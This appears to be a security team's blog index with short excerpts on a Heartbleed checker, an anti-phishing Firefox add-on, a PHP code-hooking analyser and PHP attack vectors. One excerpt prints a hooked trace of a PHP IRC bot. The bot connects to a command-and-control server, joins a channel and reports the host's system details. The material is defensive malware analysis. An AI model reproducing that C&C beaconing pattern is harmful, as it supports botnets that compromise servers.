Heartbleed (CVE-2014-0160) is a vulnerability on OpenSSL library which is affected on million of website. This will cause any user on the internet to read system memory. Our team have working to provide an alternative URL for user to verify their web server for vulnerable OpenSSL. User can visit to the following URL: http://heartbleed.honeynet.org.my/ If […]
Mozilla just approved the sandbox version of DontPhishMe and now it is public 🙂 Get the latest version of DontPhishMe (v0.3.2) for Firefox and feel free to comment and report bugs.
pKaji is a free service provided by MyCERT that allows one to analyze PHP codes. It facilitates detection of network activities and other potentially malicious activities within the code by using the ‘hooking’ technique. Basically, it uses the APD (Advance PHP Debugger) extension to hook the original PHP built-in function. Using pKaji To use pKaji, […]
I’m working on analyzing remote file inclusion (RFI) code. For pBot class which uses an IRF server as their command and control (C&C) , we are interested to get the IP addresses of the C&C, the channel name and the nickname used to connect to irc server. Below are sample of output:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 |
ok! <fsockopen>(host=irc.server_name.net, port=6667, , , 30)</fsockopen> <fwrite>( 1160 , “USER inul07429 127.0.0.1 localhost :Linux phpsBox 2.6.24-24-server #1 SMP Fri Sep 18 17:24:10 UTC 2009 i686 ” , )</fwrite> <fwrite>( 1160 , “NICK [E]inul92112 ” , )</fwrite> <fwrite>( 1160 , “MODE [E]inul92112 +ps” , )</fwrite> <fwrite>( 1160 , “JOIN #knk !anime” , )</fwrite> <fwrite>( 1160 , “PRIVMSG #trouxanime :[uname!]: Linux phpsBox 2.6.24-24-server #1 SMP Fri Sep 18 17:24:10 UTC 2009 i686 (safe: off)” , )</fwrite> <fwrite>( 1160 , “PRIVMSG #trouxanime :[vuln!]: http://” , )</fwrite> <fwrite>( 1160 , “NICK [E]inul97869” , )</fwrite> <fwrite>( 1160 , “PONG :1508829909” , )</fwrite> <fwrite>( 1160 , “PONG :1508829909” , )</fwrite> <fwrite>( 1160 , “PONG :1508829909” , )</fwrite> <fwrite>( 1160 , “PONG :1508829909” , )</fwrite> |
PHP is a very popular language nowadays. But at the same time, it’s also one of the main sources for user accounts and servers getting compromised. Every PHP developer and hoster should understand the primary attack vectors being used by attackers against PHP applications. They also should be able to classify PHP functions that allowed […]